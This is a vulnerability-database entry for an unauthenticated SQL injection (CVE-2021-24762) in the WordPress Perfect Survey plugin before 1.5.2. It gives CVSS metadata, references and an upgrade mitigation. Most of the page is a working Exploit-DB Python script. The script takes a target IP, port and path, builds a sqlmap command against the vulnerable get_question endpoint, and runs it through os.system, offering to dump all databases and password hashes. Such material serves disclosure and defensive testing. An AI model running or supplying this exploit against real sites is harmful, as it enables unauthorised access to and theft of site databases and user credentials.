WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)

vendor:

Perfect Survey

by:

Ron Jost (Hacker5preme)

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Perfect Survey

Affected Version From: < 1.5.2

Affected Version To: 1.5.2001

Patch Exists: YES

Related CWE: CVE-2021-24762

CPE: a:getperfectsurvey:perfect_survey:1.5.1

Metasploit:

Other Scripts:

Tags: cve,wpscan,cve2021,sqli,wp,wordpress,wp-plugin,unauth,edb

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://www.exploit-db.com/exploits/50766, https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget, https://nvd.nist.gov/vuln/detail/CVE-2021-24762, https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad

Nuclei Metadata: {'max-request': 1, 'framework': 'wordpress', 'vendor': 'getperfectsurvey', 'product': 'perfect_survey'}

Platforms Tested: Ubuntu 20.04

2022

WordPress Plugin Perfect Survey – 1.5.1 – SQLi (Unauthenticated)

The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.

Mitigation:

Upgrade to version 1.5.2 or later.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)
# Date 18.02.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.getperfectsurvey.com/
# Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip
# Version: < 1.5.2
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24762
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md

'''
Description:
The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before
using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
'''

banner = '''
                                                                                                      
   ___    _     _  ______         ____   ____     ____   ___           ____  _    _  _______  _____    ____  
 _(___)_ (_)   (_)(______)      _(____) (____)  _(____) (___)        _(____)(_)  (_)(_______)(_____) _(____) 
(_)   (_)(_)   (_)(_)__  ______(_) _(_)(_)  (_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_   _(_)(_)___  (_) _(_) 
(_)    _ (_)   (_)(____)(______) _(_)  (_)  (_)  _(_)     (_)(______) _(_)  (________)_(_)  (_____)_  _(_)   
(_)___(_) (_)_(_) (_)____       (_)___ (_)__(_) (_)___    (_)        (_)___      (_) (_)    (_)___(_)(_)___  
  (___)    (___)  (______)     (______) (____) (______)   (_)       (______)     (_)(_)      (_____)(______) 
                                                                                                             
                                                                                                             
								[+] Perfect Survey - SQL Injection
								[@] Developed by Ron Jost (Hacker5preme)

'''
print(banner)

import argparse
from datetime import datetime
import os

# User-Input:
my_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH

print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" '
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url +  retrieve_mode + ' --answers="follow=Y" --batch -v 0'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))